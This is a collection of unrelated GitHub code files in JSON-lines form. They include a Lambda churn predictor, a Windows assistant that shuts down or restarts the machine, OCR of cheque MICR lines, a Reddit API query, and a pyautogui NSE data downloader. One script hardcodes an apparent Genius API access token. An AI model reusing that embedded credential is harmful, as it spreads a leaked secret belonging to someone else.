\"0,0,0,1,0,0,0,0\", \n \"finance\" : \"0,0,0,0,1,0,0,0\", \n \"gov\" : \"0,0,0,0,0,1,0,0\",\n \"travel\" : \"0,0,0,0,0,0,1,0\",\n \"energy\" : \"0,0,0,0,0,0,0,1\",\n }\n fullRequest = json.loads(eventJsonStr)\n companyJsonStr = fullRequest['body']\n logger.info('payload:' + companyJsonStr)\n companyJson = json.loads(companyJsonStr)\n payload= str(companyJson['revenu']) \\\n + \",\" + str(companyJson['employee']) \\\n + \",\" + str(companyJson['job30']) \\\n + \",\" + str(companyJson['job90']) \\\n + \",\" + str(companyJson['monthlyFee']) \\\n + \",\" + str(companyJson['totalFee']) \\\n + \",\" + industryMapping[companyJson['industry']]\n \n response = runtime.invoke_endpoint(EndpointName=ENDPOINT_NAME,\n ContentType='text/csv',\n Body=payload)\n result = json.loads(response['Body'].read().decode())\n prediction = result['predictions'][0]\n logger.info(str(prediction))\n except Exception as e:\n # Send some context about this error to Lambda Logs\n print(e)\n raise e\n if prediction['predicted_label'] == 1:\n churn = 'true';\n else:\n churn = 'false';\n return {\n 'statusCode': 200,\n 'body': '{ \"churn\":' + churn +'}'\n }","repo_name":"jbcodeforce/big-data-tenant-analytics","sub_path":"setup/apigw-lambda-cdk/lambda/lambda-handler.py","file_name":"lambda-handler.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"39190716714","text":"# (c) 2020 - Akash Sarkar\r\n# win_nix\r\n\r\nimport sys\r\nsys.path.insert(0, 'E:/Projects/Python/myAssistant/nixAssistant/root/common/')\r\n\r\nimport os\r\nimport ctypes\r\nimport time\r\n\r\nimport speak_nix as nix\r\n\r\ndef lock():\r\n ctypes.windll.user32.LockWorkStation()\r\n time.sleep(1)\r\n print(\"Your windows has been locked\")\r\n nix.speak(\"Windows has been locked!\")\r\n \r\n\r\ndef shutdown(t):\r\n while t:\r\n mins, secs = divmod(t, 60)\r\n timer = '{:1d}{:1d}'.format(mins, secs)\r\n print(timer, end=\"\\r\")\r\n nix.speak(timer)\r\n time.sleep(1)\r\n t -= 1\r\n print(\"Windows is shutting down!\")\r\n nix.speak(\"Windows is shutting down\")\r\n os.system(\"shutdown /s /t 0\")\r\n exit()\r\n\r\ndef restart(t):\r\n while t:\r\n mins, secs = divmod(t, 60)\r\n timer = '{:1d}{:1d}'.format(mins, secs)\r\n print(timer, end=\"\\r\")\r\n nix.speak(timer)\r\n time.sleep(1)\r\n t -= 1\r\n print(\"Windows is restarting now!\")\r\n nix.speak(\"Your Windows is restarting now!\")\r\n os.system(\"shutdown /r /t 0\")\r\n exit()\r\n\r\ndef logoff(t):\r\n while t:\r\n mins, secs = divmod(t, 60)\r\n timer = '{:1d}{:1d}'.format(mins, secs)\r\n print(timer, end=\"\\r\")\r\n nix.speak(timer)\r\n time.sleep(1)\r\n t -= 1\r\n print(\"Windows is logging out!\")\r\n nix.speak(\"Windows is logging out\")\r\n os.system(\"shutdown /l /t 0\")\r\n exit()\r\n","repo_name":"akash-sr12/python-desktop-assistant","sub_path":"root/win_nix.py","file_name":"win_nix.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"18252690331","text":"sr = lambda: input()\nir = lambda: int(sr())\nlr = lambda: list(map(int, sr().split()))\n\nmod = 10 ** 9 + 7\n# mod = 998244353\n\nimport sys\nsys.setrecursionlimit(10**7)\n\nh,w = lr()\na = [lr() for i in range(h)]\ncost = [[0 for j in range(w)] for i in range(h)]\n\nvisited = [[False for j in range(w)] for i in range(h)]\n\ndef getCost(i,j):\n if visited[i][j]:\n return cost[i][j]\n\n ret = 1\n if 0<=i-1 and a[i-1][j] > a[i][j]:\n ret += getCost(i-1, j)\n if 0<=j-1 and a[i][j-1] > a[i][j]:\n ret += getCost(i, j-1)\n if i+1 a[i][j]:\n ret += getCost(i+1, j)\n if j+1 a[i][j]:\n ret += getCost(i, j+1)\n ret = ret%mod\n cost[i][j] = ret\n visited[i][j] = True\n return ret\n\n\nfor ny in range(h):\n for nx in range(w):\n if visited[ny][nx]:\n continue\n\n # 幅優先しつつcostを埋めていく\n getCost(ny,nx)\n visited[ny][nx] = True\n\nans = 0\nfor i in range(h):\n for j in range(w):\n ans = (ans+cost[i][j])%mod\n\nprint(ans)","repo_name":"masora1030/atcoder","sub_path":"atcoder.jp/abc037/abc037_d/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"74197145189","text":"import time\r\n\r\nfrom server.Controleur.CtrlConversation import CtrlConversation\r\nfrom server.Model.Bucket import Bucket\r\nfrom server.Model.Command import command\r\nfrom server.Model.Statut import statut\r\nfrom server.Utils.Wrapper import Wrapper\r\n\r\n\r\nclass ActionHandler:\r\n\r\n def __init__(self, parent):\r\n self.bucket = Bucket()\r\n self.parent = parent\r\n\r\n def handle(self,data, sock):\r\n self.bucket.addMessage(data)\r\n if self.bucket.getNatureOfLastMessage() == command.ASK:\r\n appele = self.getUserFromNumTel(self.bucket.getInnerMessage())\r\n appelant = self.getUserFromSock(sock)\r\n if self.isDestAvailable(self.bucket.getInnerMessage()):\r\n ctrlCommunication = CtrlConversation(appelant,appele,self.parent)\r\n ctrlCommunication.startLoop()\r\n elif self.isDestExists(self.bucket.getInnerMessage()):\r\n self.parent.sendMessageTo(appelant.sock, Wrapper.wrapStatus(str(statut.BUSY)))\r\n else:\r\n self.parent.sendMessageTo(appelant.sock, Wrapper.wrapError(str(statut.NOT_FOUND)))\r\n\r\n\r\n def initiateConnectionWithNewUser(self, user):\r\n self.parent.sendMessageTo(user.sock, Wrapper.wrapStatus(\"202\"))\r\n time.sleep(1)\r\n self.parent.sendMessageTo(user.sock, Wrapper.wrapMessage(user.numTel))\r\n\r\n def isDestAvailable(self, numTel):\r\n for user in self.parent.connectedUser :\r\n if user.numTel == numTel and user.statut == statut.READY_FOR_CONVERSATION:\r\n return True\r\n return False\r\n def isDestExists(self, numTel):\r\n for user in self.parent.connectedUser :\r\n if user.numTel == numTel:\r\n return True\r\n return False\r\n\r\n def getUserFromNumTel(self,numTel):\r\n for user in self.parent.connectedUser :\r\n if user.numTel == numTel:\r\n return user\r\n\r\n def getUserFromSock(self,sock):\r\n for user in self.parent.connectedUser :\r\n if user.sock == sock:\r\n return user","repo_name":"azpery/commutel","sub_path":"server/Controleur/ActionHandler.py","file_name":"ActionHandler.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"39689792600","text":"# -*- coding: utf-8 -*-\nfrom setuptools import setup, find_packages\nimport io\nimport os\nimport re\n\n\ndef read(*names, **kwargs):\n with io.open(\n os.path.join(os.path.dirname(__file__), *names),\n encoding=kwargs.get(\"encoding\", \"utf8\")\n ) as fp:\n return fp.read()\n\n\nlong_description = read('README.rst')\n\n\ndef find_version(*file_paths):\n version_file = read(*file_paths)\n version_match = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\", version_file, re.M)\n if version_match:\n return version_match.group(1)\n raise RuntimeError(\"Unable to find version string.\")\n\n\nsetup(name='elampclient',\n version=find_version('elampclient', 'version.py'),\n description='eLamp API clients for Web API',\n long_description=long_description,\n url='https://github.com/elampapi/python-elampclient',\n author='eLamp',\n author_email='support@elamp.fr',\n license='MIT',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Topic :: System :: Networking',\n 'Topic :: Office/Business',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n ],\n keywords='elamp elamp-web elamp-api skill skill data',\n packages=find_packages(exclude=['docs', 'docs-src', 'tests']),\n install_requires=[\n 'websocket-client >=0.35, <1.0a0',\n 'requests >=2.11, <3.0a0',\n 'six >=1.10, <2.0a0',\n 'PyJWT >=1.6.4',\n 'cryptography >=2.3'\n ])","repo_name":"elamp/python-client","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"74650317670","text":"from collections import Sequence\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\nfrom tqdm import tqdm\nfrom libs.cams.basic import _BaseWrapper\n\nclass BagCAMs(_BaseWrapper):\n\n def __init__(self, extractor, classifier):\n self.fmap_pool = {}\n self.fmap_pool_in = {}\n self.grad_pool = {}\n self.grad_pool_in = {}\n \n super(BagCAMs, self).__init__(extractor, classifier)\n \n def save_grads(key):\n def backward_hook(module, grad_in, grad_out):\n self.grad_pool[key] = grad_out[0].detach()\n\n if isinstance(module, nn.ReLU):\n return (F.relu(grad_in[0]),)\n \n return backward_hook\n \n def save_fmaps(key):\n def forward_hook(module, input, output):\n self.fmap_pool[key] = output.detach()\n self.fmap_pool_in[key] = input[0].detach()\n\n return forward_hook\n\n for module in self.model.named_modules():\n self.handlers.append(module[1].register_forward_hook(save_fmaps(module[0])))\n self.handlers.append(module[1].register_backward_hook(save_grads(module[0])))\n\n def _find(self, pool, target_layer):\n if target_layer in pool.keys():\n return pool[target_layer]\n else:\n raise ValueError(\"Invalid layer name: {}\".format(target_layer))\n\n def backward(self, ids):\n \"\"\"\n Class-specific backpropagation\n \"\"\"\n self.ids = ids\n one_hot = self._encode_one_hot(ids)\n self.model.zero_grad()\n ##\n self.phi = torch.zeros(self.logits.shape[0], 1).cuda()\n for i in range(0, self.logits.shape[0]):\n self.phi[i] = self.logits[i, ids[i]]\n # self.logits[:, ids]\n ##\n #print(one_hot)\n self.logits.log().backward(gradient=one_hot, retain_graph=True)\n\n def generate(self, target_layer):\n\n ##obtain the gradient\n grads = self._find(self.grad_pool, target_layer)\n\n ##obtain the feature map\n features = self._find(self.fmap_pool, target_layer)\n\n ##Calculate BagCAMs\n term_2 = grads*features\n term_1 = grads*features + 1\n term_1 = F.adaptive_avg_pool2d(term_1, 1) #sum_m\n bagcams = torch.relu(torch.mul(term_1, term_2)).sum(dim=1, keepdim=True) #sum_c\n\n ##Upsampling to Original Size of Images\n bagcams = F.interpolate(\n bagcams, self.image_shape, mode=\"bilinear\", align_corners=False\n )\n \n ##Normalized the localization Maps\n B, C, H, W = bagcams.shape\n bagcams = bagcams.view(B, -1)\n bagcams -= bagcams.min(dim=1, keepdim=True)[0]\n bagcams /= bagcams.max(dim=1, keepdim=True)[0]\n bagcams = bagcams.view(B, C, H, W)\n\n return bagcams","repo_name":"zh460045050/BagCAMs","sub_path":"libs/cams/bagcams.py","file_name":"bagcams.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"71"} +{"seq_id":"15983325630","text":"import sys\nimport dash\nimport importlib\nfrom dash import dcc, html\nimport plotly.express as px\nfrom scipy.integrate import solve_ivp\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Output, Input\nfrom utilities import Parameters, create_parameter_sliders\n\nif len(sys.argv) != 2:\n raise ValueError(\"Please provide input file\")\nelif len(sys.argv) == 2:\n file_location = '/'.join(sys.argv[1].split('/')[:-1])\n sys.path.append(file_location)\n file_name = sys.argv[1].split('/')[-1]\n module_name = file_name.split('.')[0]\n try:\n model = importlib.import_module(module_name)\n except ImportError:\n raise ImportError(\"File not found\")\n\n\ncolors = px.colors.qualitative.Dark24\napp = dash.Dash(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP])\napp.title = \"Mathematical Model Interactive Dashboard\"\nserver = app.server\n\napp.layout = dbc.Container(\n [\n dbc.Row([\n dbc.Col([\n html.H1(app.title, style={\"text-align\": \"center\"}),\n ], className=\"py-2\"),\n ], className=\"g-0\", style={\"flex\": \"0 1 auto\"}),\n dbc.Row([\n dbc.Col([\n dbc.Row([\n dbc.Col([html.H4(\"Model Parameters\")],\n style={\"text-align\": \"center\"},\n className=\"pt-1\"),\n dbc.Col([dbc.Button('Reset', id='reset_params',\n class_name='primary my-1', n_clicks=0)], width=3),\n ], style={\"width\": \"100%\"}, className=\"pb-3\"),\n *create_parameter_sliders(model.parameters),\n dbc.Row([\n dbc.Col([html.H4(\"Simulation Parameters\")],\n style={\"text-align\": \"center\"})\n ], style={\"width\": \"100%\"}, className=\"py-3\"),\n dbc.Row([\n dbc.Col([\n dbc.Row(html.H5(\"Simulation Time\",\n style={\"text-align\": \"center\"}),\n className=\"pt-2\"),\n ]),\n dbc.Col([\n dbc.Input(id=\"sim_time-input\", type=\"number\",\n value=1000, min=1e-4, max=1e4,\n debounce=False)\n ]),\n ], style={\"width\": \"100%\"}, className=\"px-3\", align=\"center\"),\n\n dbc.Row([\n html.Div([html.H4(\"Plot Parameters\")],\n style={\"text-align\": \"center\"})\n ], style={\"width\": \"100%\"}, className=\"py-3\"),\n dbc.Row([\n dbc.Col([\n dbc.Row(html.H5(\"Plot height (px)\",\n style={\"text-align\": \"center\"}),\n className=\"pt-2\"),\n ]),\n dbc.Col([\n dbc.Input(id=\"plot_height-input\", type=\"number\",\n value=200, min=10, max=800, debounce=False)\n ]),\n ], style={\"width\": \"100%\"}, className=\"px-3\", align=\"center\"),\n ], width=3, style={\"height\": \"100%\", \"overflow\": \"auto\"}),\n\n dbc.Col([\n dbc.Row(\n dcc.Graph(\n id=f\"{var}\"), id=f\"{var}-row\", style={\"width\": \"100%\"})\n for var in model.variables.keys()],\n width=9, style={\"height\": \"100%\", \"overflow\": \"auto\"}),\n ], className=\"g-0\", style={\"flex\": \"1 1 auto\", \"overflow\": \"auto\"}),\n ], fluid=True, className=\"g-0\",\n style={\"height\": \"100vh\", \"display\": \"flex\", \"flex-direction\": \"column\"})\n\n\n@app.callback(\n [Output(f\"{p}-display\", \"children\") for p in model.parameters.keys()],\n [Input(f\"{p}-slider\", \"drag_value\") for p in model.parameters.keys()],\n prevent_initial_call=True)\ndef update_labels(*params):\n return [f\"{p}: {params[i]:.3f}\"\n for i, p in enumerate(model.parameters.keys())]\n\n\n@app.callback(\n [Output(f\"{p}-slider\", \"value\") for p in model.parameters.keys()],\n Input('reset_params', 'n_clicks'),\n prevent_initial_call=True)\ndef reset_params(n_clicks):\n return [model.parameters[p]['init'] for p in model.parameters.keys()]\n\n\n@app.callback(\n [Output(f\"{v}\", \"figure\") for v in model.variables.keys()],\n Input('sim_time-input', \"value\"), Input(\"plot_height-input\", \"value\"),\n [Input(f\"{p}-slider\", \"value\") for p in model.parameters.keys()],\n prevent_initial_call=False)\ndef simulate(t_stop, height, *params):\n if t_stop is None:\n t_stop = 1000\n elif height is None:\n height = 200\n\n p_dict = {p: float(val) for p, val in\n list(zip(model.parameters.keys(), params))}\n p = Parameters(p_dict)\n init_cond = [val for _, val in model.variables.items()]\n sol = solve_ivp(model.equations, [0, t_stop], init_cond, args=(p,),\n method='LSODA')\n\n figures = []\n\n for idx, var in enumerate(model.variables.keys()):\n fig = px.scatter(x=sol.t, y=sol.y[idx, :],\n labels={'x': 'Time', 'y': f\"{var}\"},\n height=height)\n fig['data'][0]['line']['color'] = colors[idx]\n fig.update_layout(font=dict(size=15), margin=dict(t=0.1, b=0, r=25),\n hovermode=False)\n figures.append(fig)\n\n return figures\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True)\n","repo_name":"ftavella/model-dashboard","sub_path":"src/dashboard_app.py","file_name":"dashboard_app.py","file_ext":"py","file_size_in_byte":5470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"17583509609","text":"#!/usr/bin/python3\r\n\"\"\"Queries reddit api for num of subscribers for a given subreddit\"\"\"\r\n\r\nimport requests\r\n\r\n\r\ndef number_of_subscribers(subreddit):\r\n \"\"\"Returns number of subscribers\"\"\"\r\n user_agent = {'User-agent': 'Mozilla/5.0'}\r\n url = \"https://www.reddit.com/r/\" + subreddit + \"/about.json\"\r\n resp = requests.get(url, allow_redirects=False, headers=user_agent)\r\n if resp.status_code in (302, 404):\r\n return 0\r\n return resp.json().get('data').get('subscribers')\r\n","repo_name":"paul-murithi/alx-system_engineering-devops","sub_path":"0x16-api_advanced/0-subs.py","file_name":"0-subs.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"28654702260","text":"import csv\npath='/home/rishabh/F/MTECH/Software-Systems-Development/python/weighted_score_date_format.csv'\nf=open(path, 'r')\nrow=csv.reader(f)\nheader = next(f)\nfor line in row:\n\ttry:\n\t\tpart1 = line[2].strip(\"'\")\n\t\tpart2 = line[3].strip(\"'\")\n\t\tpartM = int(part1) * float(part2)\n\texcept ValueError as err:\n\t\tprint(\"something wrong...\",err)\n\t\tcontinue\n\t\tprint(line)\n\t#print('First part : ',line[2])\n\t\n\tprint(partM)\nf.close()","repo_name":"rishabh26malik/MTECH-SEM-1-BACKUP","sub_path":"Software-Systems-Development/python/a1.py","file_name":"a1.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"19474754553","text":"from rest_framework.viewsets import ModelViewSet\n\n\nclass MutableModelViewSet(object):\n @classmethod\n def create(cls, model, serializer_class):\n class_name = '{0}ViewSet'.format(model.__name__)\n attrs = {\n 'queryset': model.objects.all(),\n 'serializer_class': serializer_class\n }\n return type(class_name, (ModelViewSet,), attrs)\n","repo_name":"JesusAnaya/mezzanine-rest-api","sub_path":"mezzanine_rest/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"7072232572","text":"#tesseract for micr detection using language 'mcr' from the trained model\nimport pytesseract as tess\nfrom PIL import Image,ImageEnhance\nimport numpy as np\nimport cv2\n\n# add tesseract to path\ntess.pytesseract.tesseract_cmd = r\"C:\\Program Files\\Tesseract-OCR\\tesseract.exe\"\n\ndef micr(path):\n cheque_img = Image.open(path)\n\n #checking the mode\n cheque_img=np.array(cheque_img.convert('RGB'))\n\n shape=cheque_img.shape\n\n micr_extraction= cheque_img[int(shape[0]*0.92):int(shape[0]*0.99), int(shape[1]*0.25):int(shape[1]*0.8)]\n cv2.imwrite(r'micr.jpg',micr_extraction)\n micr_string=tess.image_to_string(micr_extraction,lang=\"mcr\")\n # c000009c 60001205901 00274880 31\n # 0000000980 60001205901 00274880 31\n # c000009d0 60001205901 00274880 31\n # c000009c 60001205901 002748c 31\n # micr_string= \"c000009c 60001205901 002748c 31\"\n\n cheque_number=\"\"\n '''The string before first space is cheque number'''\n val=micr_string.split()[0]\n if 'c' in micr_string:\n for i in val:\n if i.isdigit():\n cheque_number+=i\n \n else:\n ind=(len(val)-6)//2\n cheque_number=val[ind:ind+6]\n\n '''final micr'''\n final_micr=micr_string.split()[1][:9]\n Account_ID=micr_string.split()[2][:6]\n Transaction_code=micr_string[-3:]\n print(micr_string)\n print(\"Cheque number :\",cheque_number)\n print(\"MICR code :\",final_micr)\n print(\"Account ID :\",Account_ID)\n print(\"Transaction code :\",Transaction_code)\n return cheque_number,final_micr,Account_ID,Transaction_code\n\n\n# print(micr(r'C:\\Users\\ANU\\Downloads\\bob_bhuvana_signNV_1.jpg'))","repo_name":"ANUSHRUTHIKAE/BOB_PROJ","sub_path":"micr.py","file_name":"micr.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"71989704230","text":"# find max artist id\n\nimport lyricsgenius\ngenius = lyricsgenius.Genius(\"uZp3-3BY12KCvrTaSmi3Gv9EuTEAp-t4X4QOZ1OJbzWgVZakFrP4GF0Vsj0cz_Lu\")\n\nartist_id = 2961456\nresponse = genius.artist_songs(artist_id, per_page=50, page=1)\nprint(response[\"songs\"])\nmax_err = 0\n0/0\nwhile artist_id < 2961595:\n\ttry:\n\t\tresponse = genius.artist_songs(artist_id, per_page=50, page=1)\n\t\tprint(artist_id)\n\texcept:\n\t\tmax_err += 1\n\t\tprint(max_err)\n\tartist_id += 1\n\n\nmax_artist_id = 2961456\n","repo_name":"gokulkolady/lyrec_nlp","sub_path":"max_artist_id.py","file_name":"max_artist_id.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"38968853766","text":"'''\r\n 创建数据集,分为用户点对,uav节点位置\r\n'''\r\nimport torch\r\nimport numpy as np\r\nimport random\r\nfrom configs import args\r\nfrom sklearn.cluster import KMeans\r\n\r\n\r\ndef data_create(N, M):\r\n '''\r\n input:\r\n N:用户对数\r\n M:无人机个数\r\n \r\n Output:\r\n features:用户和无人机的位置,前2N个为用户坐标,后M个为无人机坐标\r\n edge_index:边的索引\r\n \r\n 用户位置随机生成\r\n 无人机位置为2N个用户的KMeans聚类\r\n '''\r\n # torch.manual_seed(50)\r\n # random.seed(50)\r\n x1 = torch.rand(N, 1)\r\n x2 = torch.rand(N, 1)\r\n y1 = torch.rand(N, 1)\r\n y2 = torch.rand(N, 1)\r\n\r\n idx = list(range(N))\r\n random.shuffle(idx)\r\n x1 = x1[idx]\r\n random.shuffle(idx)\r\n x2 = x2[idx]\r\n\r\n user_src = torch.column_stack([x1, y1])\r\n user_dst = torch.column_stack([x2, y2])\r\n users = torch.row_stack([user_src, user_dst])\r\n kmeans = KMeans(n_clusters=M, random_state=0).fit(users.numpy())\r\n uav = torch.FloatTensor(kmeans.cluster_centers_)\r\n # index_src = torch.repeat_interleave(torch.arange(len(users), len(users)+len(uav)).unsqueeze(1), repeats=len(users)+len(uav), dim=1)\r\n index_src = torch.repeat_interleave(torch.arange(len(users), len(users)+len(uav)).unsqueeze(1), repeats=len(users), dim=1)\r\n index_src = torch.reshape(index_src, (1, -1)).squeeze()\r\n \r\n # index_dst = torch.arange(0, len(users)+len(uav)).repeat(len(uav))\r\n index_dst = torch.arange(0, len(users)).repeat(len(uav))\r\n features = torch.row_stack([user_src, user_dst, uav]).to(args.device)\r\n edge_index = torch.row_stack([index_src, index_dst]).to(args.device)\r\n\r\n return features, edge_index\r\n\r\n# features, edge_index = data_create(100, 10)\r\n# print(edge_index)\r\n# print(edge_index.shape)\r\n# exit()\r\n","repo_name":"UNIC-Lab/LGNN-RGNN","sub_path":"data_load.py","file_name":"data_load.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"8140813455","text":"\"\"\"empty message\n\nRevision ID: 7aa5c1a67dce\nRevises: 521ce838dbdf\nCreate Date: 2018-06-26 19:04:57.105964\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '7aa5c1a67dce'\ndown_revision = '521ce838dbdf'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('posts', 'category')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('posts', sa.Column('category', mysql.VARCHAR(length=255), nullable=True))\n # ### end Alembic commands ###\n","repo_name":"johnwang1996/myDemo","sub_path":"loginAndRegist/migrations/versions/7aa5c1a67dce_.py","file_name":"7aa5c1a67dce_.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"73538462631","text":"class Solution:\n '''\n 为奇数时,中间不需要旋转,所以旋转的个数为n^2-1,即(n+1)(n-1),偶数同理,\n 因为一次循环是同时互相交换4个点,所以总的旋转次数要除以4。\n 剩下就是计算旋转下标,这个可以用5X5的矩阵中的[2][0]的旋转来debug,\n 例如[4][2]旋转后为[2][0]\n '''\n def rotate(self, matrix: List[List[int]]) -> None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n \"\"\"\n size = len(matrix);\n if size % 2 == 0:\n for row in range(size // 2):\n for col in range(size // 2):\n matrix[row][col],matrix[size-col-1][row],\\\n matrix[size-row-1][size-col-1],matrix[col][size-row-1]\\\n = matrix[size-col-1][row],matrix[size-row-1][size-col-1],\\\n matrix[col][size-row-1],matrix[row][col]\n else:\n for row in range((size+1) // 2):\n for col in range((size-1) // 2):\n matrix[row][col], matrix[size - col - 1][row], \\\n matrix[size - row - 1][size - col - 1], matrix[col][size - row - 1] \\\n = matrix[size - col - 1][row], matrix[size - row - 1][size - col - 1], \\\n matrix[col][size - row - 1], matrix[row][col]","repo_name":"JackCaptain1015/py_lc","sub_path":"48_旋转图像.py","file_name":"48_旋转图像.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"17579646949","text":"\nimport imp\nfrom flask_app import app\nfrom flask import render_template, session, redirect, request\nfrom flask_app.models.owner import Owner\n\n@app.route(\"/makeOwner\")\ndef makeOwner():\n return render_template(\"makeOwner.html\")\n\n\n@app.route(\"/makingOwner\", methods=[\"POST\"])\ndef making_owner():\n data = {\n \"first_name\" : request.form[\"first_name\"],\n \"last_name\" : request.form[\"last_name\"]\n\n }\n owner_id = Owner.save_owner(data)\n return redirect(\"/\")\n\n@app.route(\"/owner/\")\ndef show_owner(owner_id):\n data = {\n \"id\" : owner_id\n }\n owner = Owner.get_owner_with_teams(data)\n return render_template(\"one_owner.html\", owner = owner)\n\n\n#===========================================================\n#delete\n@app.route(\"/delete/\")\ndef delete_owner(id):\n data = {\n \"id\" : id\n }\n Owner.delete(data)\n return redirect(\"/\")\n\n@app.route(\"/update/\")\ndef update_owner(id):\n data = {\n \"id\" : id\n }\n owner = Owner.one_owner(data)\n return render_template(\"update.html\", owner = owner)\n\n@app.route(\"/updating/\", methods=[\"POST\"])\ndef updating_owner(id):\n data = {\n \"id\" : id,\n \"first_name\" : request.form[\"first_name\"],\n \"last_name\" : request.form[\"last_name\"]\n\n }\n Owner.Updating(data)\n return redirect(\"/\")\n","repo_name":"TumnahST96/CodingDojo","sub_path":"Flask_SQL/FullLogIn/flask_app/controllers/ownercontroller.py","file_name":"ownercontroller.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"74343448228","text":"import pyautogui as pag\r\nimport time, os, datetime, shutil\r\nimport keyboard\r\nimport random\r\nimport win32api, win32con\r\nimg='NSE Website images\\\\'\r\ntab=img+'newTab.PNG'\r\narchives=img+'archivesTab.PNG'\r\ndateBox=img+'dateBox.PNG'\r\nleftButton='left.png'\r\nbhavcopy=img+'Bhavcopy.PNG'\r\ndownload=img+'download.png'\r\ntop=img+'topImage.png'\r\n#pag.displayMousePosition()\r\ntarget=datetime.date(1999,1,1)\r\ndef lClick(x,y):\r\n pag.moveTo(x,y,0.5)\r\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,0,0)\r\n time.sleep(1) #This pauses the script for 0.05 seconds\r\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,0,0)\r\ndef rClick(x,y):\r\n pag.moveTo(x,y,0.5)\r\n win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTDOWN,0,0)\r\n time.sleep(0.5) #This pauses the script for 0.05 seconds\r\n win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTUP,0,0)\r\ndef finder(img,side):\r\n temp=4000\r\n attempt = 0\r\n while temp>2999:\r\n if pag.locateOnScreen(img, grayscale=True) != None: #region=(150,175,259,194),\r\n print(\"I found \"+img+\"\\n and clicking now\")\r\n pic=pag.locateCenterOnScreen(img, grayscale=True)\r\n cent=pic\r\n temp=1000\r\n elif attempt>20:\r\n pag.press('home')\r\n time.sleep(1)\r\n attempt=0\r\n else:\r\n print(\"I could not find \"+img)\r\n attempt += 1\r\n temp=3000\r\n cent=[0,0]\r\n pag.scroll(-200)\r\n print(\"Scrolled and checking\")\r\n time.sleep(1)\r\n if side == 'l':\r\n lClick(cent[0],cent[1])\r\n elif side == 'r':\r\n rClick(cent[0],cent[1])\r\n else:\r\n pag.moveTo(cent[0],cent[1],1)\r\n\r\ndef d(dd):\r\n if dd<10:\r\n return '0'+str(dd)\r\n else:\r\n return str(dd)\r\n\r\ndef m(mm):\r\n months = {1 : 'JAN',\r\n 2 : 'FEB',\r\n 3 : 'MAR',\r\n 4 : 'APR',\r\n 5 : 'MAY',\r\n 6 : 'JUN',\r\n 7 : 'JUL',\r\n 8 : 'AUG',\r\n 9 : 'SEP',\r\n 10: 'OCT',\r\n 11: 'NOV',\r\n 12: 'DEC'}\r\n return months[mm]\r\n\r\ndef previousDay(date):\r\n day31 = [1,3,5,7,8,10,12]\r\n day30 = [4,6,9,11]\r\n day = date.day\r\n month = date.month\r\n year = date.year\r\n day = day - 1\r\n if day == 0:\r\n month = month - 1\r\n if month == 0:\r\n year = year - 1\r\n month = 12\r\n if month in day31:\r\n day = 31\r\n elif month in day30:\r\n day = 30\r\n elif year%4 == 0:\r\n day = 29\r\n else:\r\n day = 28\r\n return datetime.date(year,month,day)\r\n\r\ndef previousWeekDay(date):\r\n if 1 prev_balance\n\ndef test_order_market_sell():\n c = setup_client()\n c.order_market_buy('btc',.01)\n 